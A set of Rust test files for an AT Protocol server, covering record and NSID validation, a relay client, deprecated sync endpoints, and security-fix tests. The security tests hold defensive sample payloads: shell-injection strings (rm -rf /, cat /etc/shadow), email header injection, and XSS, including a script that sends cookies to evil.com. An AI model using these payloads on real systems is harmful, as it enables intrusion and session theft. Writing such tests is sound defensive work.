assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
}
// Profile with both optional fields validates.
#[test]
fn test_validate_profile_valid() {
let validator = RecordValidator::new();
let profile = json!({
"$type": "app.bsky.actor.profile",
"displayName": "Test User",
"description": "A test user profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// A profile has no required fields beyond $type.
#[test]
fn test_validate_profile_empty_ok() {
let validator = RecordValidator::new();
let profile = json!({
"$type": "app.bsky.actor.profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// displayName over 640 chars rejected.
#[test]
fn test_validate_profile_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(641);
let profile = json!({
"$type": "app.bsky.actor.profile",
"displayName": long_name
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
}
// description over 2560 chars rejected.
#[test]
fn test_validate_profile_description_too_long() {
let validator = RecordValidator::new();
let long_desc = "d".repeat(2561);
let profile = json!({
"$type": "app.bsky.actor.profile",
"description": long_desc
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
}
// Like with a complete strong ref (uri + cid) validates.
#[test]
fn test_validate_like_valid() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// `subject` is required on a like.
#[test]
fn test_validate_like_missing_subject() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
// The strong ref itself must contain `uri`.
#[test]
fn test_validate_like_missing_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
}
// Subject uri must be an at:// URI, not an arbitrary URL.
#[test]
fn test_validate_like_invalid_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "https://example.com/not-at-uri",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
}
// Repost shares the like's shape: valid with a full strong ref...
#[test]
fn test_validate_repost_valid() {
let validator = RecordValidator::new();
let repost = json!({
"$type": "app.bsky.feed.repost",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// ...and rejected without `subject`.
#[test]
fn test_validate_repost_missing_subject() {
let validator = RecordValidator::new();
let repost = json!({
"$type": "app.bsky.feed.repost",
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
// Follow subject is a bare DID string (unlike like/repost strong refs).
#[test]
fn test_validate_follow_valid() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "did:plc:test12345",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// `subject` is required on a follow.
#[test]
fn test_validate_follow_missing_subject() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
// A non-DID subject string is rejected.
#[test]
fn test_validate_follow_invalid_subject() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
// Block mirrors follow: DID subject accepted...
#[test]
fn test_validate_block_valid() {
let validator = RecordValidator::new();
let block = json!({
"$type": "app.bsky.graph.block",
"subject": "did:plc:blocked123",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// ...non-DID subject rejected.
#[test]
fn test_validate_block_invalid_subject() {
let validator = RecordValidator::new();
let block = json!({
"$type": "app.bsky.graph.block",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
// List with name + purpose validates.
#[test]
fn test_validate_list_valid() {
let validator = RecordValidator::new();
let list = json!({
"$type": "app.bsky.graph.list",
"name": "My List",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// List name over 64 chars rejected.
#[test]
fn test_validate_list_name_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(65);
let list = json!({
"$type": "app.bsky.graph.list",
"name": long_name,
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
// Empty list name rejected (min length 1).
#[test]
fn test_validate_list_empty_name() {
let validator = RecordValidator::new();
let list = json!({
"$type": "app.bsky.graph.list",
"name": "",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
// Feed generator with did + displayName validates.
#[test]
fn test_validate_feed_generator_valid() {
let validator = RecordValidator::new();
let generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": "My Feed",
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// Generator displayName over 240 chars rejected.
#[test]
fn test_validate_feed_generator_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "f".repeat(241);
let generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": long_name,
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
}
// Unknown collections pass through as Unknown in the default (lenient) mode.
#[test]
fn test_validate_unknown_type_returns_unknown() {
let validator = RecordValidator::new();
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
}
// With require_lexicon(true), unknown collections become hard errors.
#[test]
fn test_validate_unknown_type_strict_rejects() {
let validator = RecordValidator::new().require_lexicon(true);
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
}
// $type inside the record must agree with the collection being written to.
#[test]
fn test_validate_type_mismatch() {
let validator = RecordValidator::new();
let record = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
}
// Records without $type are rejected.
#[test]
fn test_validate_missing_type() {
let validator = RecordValidator::new();
let record = json!({
"text": "Hello"
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingType)));
}
// Non-object JSON is rejected before any field checks.
#[test]
fn test_validate_not_object() {
let validator = RecordValidator::new();
let record = json!("just a string");
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
// RFC 3339 with fractional seconds and Z suffix accepted.
#[test]
fn test_validate_datetime_format_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// Numeric UTC offsets are also valid RFC 3339 and accepted.
#[test]
fn test_validate_datetime_with_offset() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// Non-RFC-3339 date strings are rejected with a dedicated error variant.
#[test]
fn test_validate_datetime_invalid_format() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
}
// Record keys: alphanumerics plus - _ . ~ are legal; "self" is a common
// literal rkey and must be accepted.
#[test]
fn test_validate_record_key_valid() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
}
// Empty rkey rejected.
#[test]
fn test_validate_record_key_empty() {
let result = validate_record_key("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
// "." and ".." are reserved path segments and must be rejected.
#[test]
fn test_validate_record_key_dot() {
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
}
// Characters outside the allowed set rejected.
#[test]
fn test_validate_record_key_invalid_chars() {
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
}
// Length boundary: 513 rejected, 512 accepted (inclusive max).
#[test]
fn test_validate_record_key_too_long() {
let long_key = "k".repeat(513);
let result = validate_record_key(&long_key);
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_at_max_length() {
let max_key = "k".repeat(512);
assert!(validate_record_key(&max_key).is_ok());
}
// NSIDs: dotted, at least three segments, hyphens allowed within segments.
#[test]
fn test_validate_collection_nsid_valid() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
}
// Empty NSID rejected.
#[test]
fn test_validate_collection_nsid_empty() {
let result = validate_collection_nsid("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
// Fewer than three segments rejected.
#[test]
fn test_validate_collection_nsid_too_few_segments() {
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
}
// Empty segments (leading, trailing, or doubled dots) rejected.
#[test]
fn test_validate_collection_nsid_empty_segment() {
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
}
// Slash, underscore, and @ are not legal NSID characters here.
#[test]
fn test_validate_collection_nsid_invalid_chars() {
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}
// Threadgate: `post` at-uri + createdAt validates.
#[test]
fn test_validate_threadgate() {
let validator = RecordValidator::new();
let gate = json!({
"$type": "app.bsky.feed.threadgate",
"post": "at://did:plc:test/app.bsky.feed.post/123",
"createdAt": now()
});
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// Labeler service record with a policies object validates.
#[test]
fn test_validate_labeler_service() {
let validator = RecordValidator::new();
let labeler = json!({
"$type": "app.bsky.labeler.service",
"policies": {
"labelValues": ["spam", "nsfw"]
},
"createdAt": now()
});
let result = validator.validate(&labeler, "app.bsky.labeler.service");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
// List item: DID subject + owning-list at-uri validates.
#[test]
fn test_validate_list_item() {
let validator = RecordValidator::new();
let item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
"createdAt": now()
});
let result = validator.validate(&item, "app.bsky.graph.listitem");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}

View File

@@ -1,86 +0,0 @@
mod common;
use common::*;
use axum::{extract::ws::Message, routing::get, Router};
use bspds::{
state::AppState,
sync::{firehose::SequencedEvent, relay_client::start_relay_clients},
};
use chrono::Utc;
use tokio::net::TcpListener;
use tokio::sync::mpsc;
// Minimal stand-in for a firehose relay: accepts one WebSocket upgrade at "/",
// signals `connected_tx`, forwards the FIRST binary frame it receives to
// `event_tx`, then stops reading. Send errors are deliberately ignored —
// the test side may have already dropped its receiver.
async fn mock_relay_server(
listener: TcpListener,
event_tx: mpsc::Sender<Vec<u8>>,
connected_tx: mpsc::Sender<()>,
) {
let handler = |ws: axum::extract::ws::WebSocketUpgrade| async {
ws.on_upgrade(move |mut socket| async move {
let _ = connected_tx.send(()).await;
// Drain frames until the first Binary one; `break` ends the session
// after capturing it, so only one event is ever forwarded.
while let Some(Ok(msg)) = socket.recv().await {
if let Message::Binary(bytes) = msg {
let _ = event_tx.send(bytes.to_vec()).await;
break;
}
}
})
};
let app = Router::new().route("/", get(handler));
// Serves until the task is dropped; unwrap is acceptable in a test helper.
axum::serve(listener, app.into_make_service())
.await
.unwrap();
}
// End-to-end check of the outbound relay client: a firehose event published on
// `state.firehose_tx` must arrive, encoded, at a connected relay WebSocket.
#[tokio::test]
async fn test_outbound_relay_client() {
// Bind to an ephemeral port so parallel tests don't collide.
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
let addr = listener.local_addr().unwrap();
let (event_tx, mut event_rx) = mpsc::channel(1);
let (connected_tx, _connected_rx) = mpsc::channel::<()>(1);
tokio::spawn(mock_relay_server(listener, event_tx, connected_tx));
let relay_url = format!("ws://{}", addr);
let db_url = get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.connect(&db_url)
.await
.unwrap();
let state = AppState::new(pool).await;
// Hand the receiver to the client; `ready_tx.closed()` resolving means the
// client dropped its end, i.e. it has finished connecting.
let (ready_tx, ready_rx) = mpsc::channel(1);
start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await;
tokio::time::timeout(
tokio::time::Duration::from_secs(5),
async {
ready_tx.closed().await;
}
)
.await
.expect("Timeout waiting for relay client to be ready");
// Publish only after readiness — events sent before the WebSocket is up
// would be lost and the test would hang on event_rx below.
let dummy_event = SequencedEvent {
seq: 1,
did: "did:plc:test".to_string(),
created_at: Utc::now(),
event_type: "commit".to_string(),
commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()),
prev_cid: None,
ops: Some(serde_json::json!([])),
blobs: Some(vec![]),
blocks_cids: Some(vec![]),
};
state.firehose_tx.send(dummy_event).unwrap();
// The mock relay forwards the first binary frame it sees; a 5s timeout
// bounds the test if the client never delivers.
let received_bytes = tokio::time::timeout(
tokio::time::Duration::from_secs(5),
event_rx.recv()
)
.await
.expect("Timeout waiting for event")
.expect("Event channel closed");
assert!(!received_bytes.is_empty());
}

377
tests/security_fixes.rs Normal file
View File

@@ -0,0 +1,377 @@
mod common;
use bspds::notifications::{
SendError, is_valid_phone_number, sanitize_header_value,
};
use bspds::oauth::templates::{login_page, error_page, success_page};
use bspds::image::{ImageProcessor, ImageError};
// CRLF stripping defeats email header injection while keeping the payload
// text (now rendered harmless on a single line).
#[test]
fn test_sanitize_header_value_removes_crlf() {
let malicious = "Injected\r\nBcc: attacker@evil.com";
let sanitized = sanitize_header_value(malicious);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(sanitized.contains("Injected"), "Original content should be preserved");
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
}
// Benign values pass through untouched.
#[test]
fn test_sanitize_header_value_preserves_content() {
let normal = "Normal Subject Line";
let sanitized = sanitize_header_value(normal);
assert_eq!(sanitized, "Normal Subject Line");
}
// Leading/trailing whitespace is trimmed.
#[test]
fn test_sanitize_header_value_trims_whitespace() {
let padded = " Subject ";
let sanitized = sanitize_header_value(padded);
assert_eq!(sanitized, "Subject");
}
// All newline flavors (\r\n, \n, bare \r) are removed.
#[test]
fn test_sanitize_header_value_handles_multiple_newlines() {
let input = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(input);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
}
// A full injection payload collapses to exactly one header line.
#[test]
fn test_email_header_injection_sanitization() {
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
let sanitized = sanitize_header_value(header_injection);
let lines: Vec<&str> = sanitized.split("\r\n").collect();
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
assert!(sanitized.contains("X-Injected:"), "All content on same line");
}
// E.164-style validation: '+' followed by 1..=N digits only.
// Note "+1" is accepted — the current rule imposes no minimum digit count
// beyond one.
#[test]
fn test_valid_phone_number_accepts_correct_format() {
assert!(is_valid_phone_number("+1234567890"));
assert!(is_valid_phone_number("+12025551234"));
assert!(is_valid_phone_number("+442071234567"));
assert!(is_valid_phone_number("+4915123456789"));
assert!(is_valid_phone_number("+1"));
}
#[test]
fn test_valid_phone_number_rejects_missing_plus() {
assert!(!is_valid_phone_number("1234567890"));
assert!(!is_valid_phone_number("12025551234"));
}
#[test]
fn test_valid_phone_number_rejects_empty() {
assert!(!is_valid_phone_number(""));
}
#[test]
fn test_valid_phone_number_rejects_just_plus() {
assert!(!is_valid_phone_number("+"));
}
// 22 digits exceeds the maximum length.
#[test]
fn test_valid_phone_number_rejects_too_long() {
assert!(!is_valid_phone_number("+12345678901234567890123"));
}
#[test]
fn test_valid_phone_number_rejects_letters() {
assert!(!is_valid_phone_number("+abc123"));
assert!(!is_valid_phone_number("+1234abc"));
assert!(!is_valid_phone_number("+a"));
}
#[test]
fn test_valid_phone_number_rejects_spaces() {
assert!(!is_valid_phone_number("+1234 5678"));
assert!(!is_valid_phone_number("+ 1234567890"));
assert!(!is_valid_phone_number("+1 "));
}
// Common human formatting (dashes, parens, dots) is also rejected.
#[test]
fn test_valid_phone_number_rejects_special_chars() {
assert!(!is_valid_phone_number("+123-456-7890"));
assert!(!is_valid_phone_number("+1(234)567890"));
assert!(!is_valid_phone_number("+1.234.567.890"));
}
// Security: the recipient string is later passed to signal-cli, so every
// shell-metacharacter / argument-injection payload must fail validation.
#[test]
fn test_signal_recipient_command_injection_blocked() {
let malicious_inputs = vec![
"+123; rm -rf /",
"+123 && cat /etc/passwd",
"+123`id`",
"+123$(whoami)",
"+123|cat /etc/shadow",
"+123\n--help",
"+123\r\n--version",
"+123--help",
];
for input in malicious_inputs {
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
}
}
// An 11 MiB payload must be rejected before decoding.
// NOTE(review): the fallback arm accepts ANY error whose Debug text mentions
// "size"/"large", which weakens the assertion — consider tightening to the
// exact FileTooLarge variant once the error type is stable.
#[test]
fn test_image_file_size_limit_enforced() {
let processor = ImageProcessor::new();
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
let result = processor.process(&oversized_data, "image/jpeg");
match result {
Err(ImageError::FileTooLarge { .. }) => {}
Err(other) => {
let msg = format!("{:?}", other);
if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") {
panic!("Expected FileTooLarge error, got: {:?}", other);
}
}
Ok(_) => panic!("Should reject files over size limit"),
}
}
// The limit is configurable: a 2 KiB payload fails a 1 KiB cap.
#[test]
fn test_image_file_size_limit_configurable() {
let processor = ImageProcessor::new().with_max_file_size(1024);
let data: Vec<u8> = vec![0u8; 2048];
let result = processor.process(&data, "image/jpeg");
assert!(result.is_err(), "Should reject files over configured limit");
}
// --- OAuth login template: XSS escaping of every injectable field ----------

/// client_id is attacker-controlled; script tags must come out escaped.
#[test]
fn test_oauth_template_xss_escaping_client_id() {
    let payload = "<script>alert('xss')</script>";
    let html = login_page(payload, None, None, "test-uri", None, None);
    assert!(!html.contains("<script>"), "Script tags should be escaped");
    assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping");
}

/// client_name must not allow tag injection (img/onerror vector).
#[test]
fn test_oauth_template_xss_escaping_client_name() {
    let payload = "<img src=x onerror=alert('xss')>";
    let html = login_page("client123", Some(payload), None, "test-uri", None, None);
    assert!(!html.contains("<img "), "IMG tags should be escaped");
    assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
}

/// scope must not allow attribute-breakout followed by a script tag.
#[test]
fn test_oauth_template_xss_escaping_scope() {
    let payload = "\"><script>alert('xss')</script>";
    let html = login_page("client123", None, Some(payload), "test-uri", None, None);
    assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
}

/// The error message must not be able to exfiltrate cookies.
#[test]
fn test_oauth_template_xss_escaping_error_message() {
    let payload = "<script>document.location='http://evil.com?c='+document.cookie</script>";
    let html = login_page("client123", None, None, "test-uri", Some(payload), None);
    assert!(!html.contains("<script>"), "Script tags in error should be escaped");
}

/// login_hint must not be able to break out of its input attribute.
#[test]
fn test_oauth_template_xss_escaping_login_hint() {
    let payload = "\" onfocus=\"alert('xss')\" autofocus=\"";
    let html = login_page("client123", None, None, "test-uri", None, Some(payload));
    assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
    assert!(html.contains("&quot;"), "Quotes should be escaped");
}

/// request_uri must not be able to inject event handlers.
#[test]
fn test_oauth_template_xss_escaping_request_uri() {
    let payload = "\" onmouseover=\"alert('xss')\"";
    let html = login_page("client123", None, None, payload, None, None);
    assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
}
/// Both the error code and the description on the error page are escaped.
#[test]
fn test_oauth_error_page_xss_escaping() {
    let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
    assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
    assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
}

/// The success page escapes the (optional) client display name.
#[test]
fn test_oauth_success_page_xss_escaping() {
    let payload = "<script>steal_session()</script>";
    let html = success_page(Some(payload));
    assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
}

/// None of the OAuth pages may emit a javascript: URL anywhere.
#[test]
fn test_oauth_template_no_javascript_urls() {
    let pages = [
        (
            login_page("client123", None, None, "test-uri", None, None),
            "Login page should not contain javascript: URLs",
        ),
        (
            error_page("test_error", None),
            "Error page should not contain javascript: URLs",
        ),
        (
            success_page(None),
            "Success page should not contain javascript: URLs",
        ),
    ];
    for (html, message) in &pages {
        assert!(!html.contains("javascript:"), "{}", message);
    }
}

/// The form action is a fixed server-side URL, never derived from input.
#[test]
fn test_oauth_template_form_action_safe() {
    let payload = "javascript:alert('xss')//";
    let html = login_page("client123", None, None, payload, None, None);
    assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
}
/// Every SendError variant produces a non-empty Display message.
#[test]
fn test_send_error_types_have_display() {
    let variants = vec![
        SendError::Timeout,
        SendError::MaxRetriesExceeded("test".to_string()),
        SendError::InvalidRecipient("bad recipient".to_string()),
    ];
    for variant in &variants {
        assert!(!variant.to_string().is_empty());
    }
}

/// The timeout variant actually says "timeout".
#[test]
fn test_send_error_timeout_message() {
    let msg = SendError::Timeout.to_string();
    assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
}

/// MaxRetriesExceeded carries its inner detail (or at least says "retries").
#[test]
fn test_send_error_max_retries_includes_detail() {
    let msg = SendError::MaxRetriesExceeded("Server returned 503".to_string()).to_string();
    assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
}
/// checkSignupQueue accepts an ordinary session JWT and reports activated.
#[tokio::test]
async fn test_check_signup_queue_accepts_session_jwt() {
    use common::{base_url, client, create_account_and_login};
    let base = base_url().await;
    let http = client();
    let (token, _did) = create_account_and_login(&http).await;
    let url = format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base);
    let res = http
        .get(url)
        .header("Authorization", format!("Bearer {}", token))
        .send()
        .await
        .unwrap();
    assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["activated"], true);
}

/// checkSignupQueue also works unauthenticated.
#[tokio::test]
async fn test_check_signup_queue_no_auth() {
    use common::{base_url, client};
    let base = base_url().await;
    let http = client();
    let url = format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base);
    let res = http.get(url).send().await.unwrap();
    assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["activated"], true);
}
#[test]
fn test_html_escape_ampersand() {
let html = login_page("client&test", None, None, "test-uri", None, None);
assert!(html.contains("&amp;"), "Ampersand should be escaped");
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
}
#[test]
fn test_html_escape_quotes() {
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped");
assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped");
}
#[test]
fn test_html_escape_angle_brackets() {
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;"), "Less than should be escaped");
assert!(html.contains("&gt;"), "Greater than should be escaped");
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
}
#[test]
fn test_oauth_template_preserves_safe_content() {
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
assert!(html.contains("user@example.com"), "Login hint should be preserved");
}
#[test]
fn test_csrf_like_input_value_protection() {
let malicious = "\" onclick=\"alert('csrf')";
let html = login_page("client", None, None, malicious, None, None);
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
}
#[test]
fn test_unicode_handling_in_templates() {
let unicode_client = "客户端 クライアント";
let html = login_page(unicode_client, None, None, "test-uri", None, None);
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
}
#[test]
fn test_null_byte_in_input() {
let with_null = "client\0id";
let sanitized = sanitize_header_value(with_null);
assert!(sanitized.contains("client"), "Content before null should be preserved");
}
#[test]
fn test_very_long_input_handling() {
let long_input = "x".repeat(10000);
let sanitized = sanitize_header_value(&long_input);
assert!(!sanitized.is_empty(), "Long input should still produce output");
}

307
tests/sync_deprecated.rs Normal file
View File

@@ -0,0 +1,307 @@
mod common;
mod helpers;
use common::*;
use helpers::*;
use reqwest::StatusCode;
use serde_json::Value;
// --- com.atproto.sync.getHead (deprecated endpoint, must keep working) -----

/// Happy path: an existing repo returns a string root CID.
#[tokio::test]
async fn test_get_head_success() {
    let client = client();
    let (did, _jwt) = setup_new_user("gethead-success").await;
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert!(body["root"].is_string());
    let root = body["root"].as_str().unwrap();
    assert!(root.starts_with("bafy"), "Root CID should be a CID");
}

/// Unknown DID: 400 with the HeadNotFound error code and message.
#[tokio::test]
async fn test_get_head_not_found() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", "did:plc:nonexistent12345")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "HeadNotFound");
    assert!(body["message"].as_str().unwrap().contains("Could not find root"));
}

/// Missing `did` query parameter is a 400.
#[tokio::test]
async fn test_get_head_missing_param() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);
    let res = client.get(url).send().await.expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
/// An empty `did` value is rejected as InvalidRequest.
#[tokio::test]
async fn test_get_head_empty_did() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);
    let res = client
        .get(url)
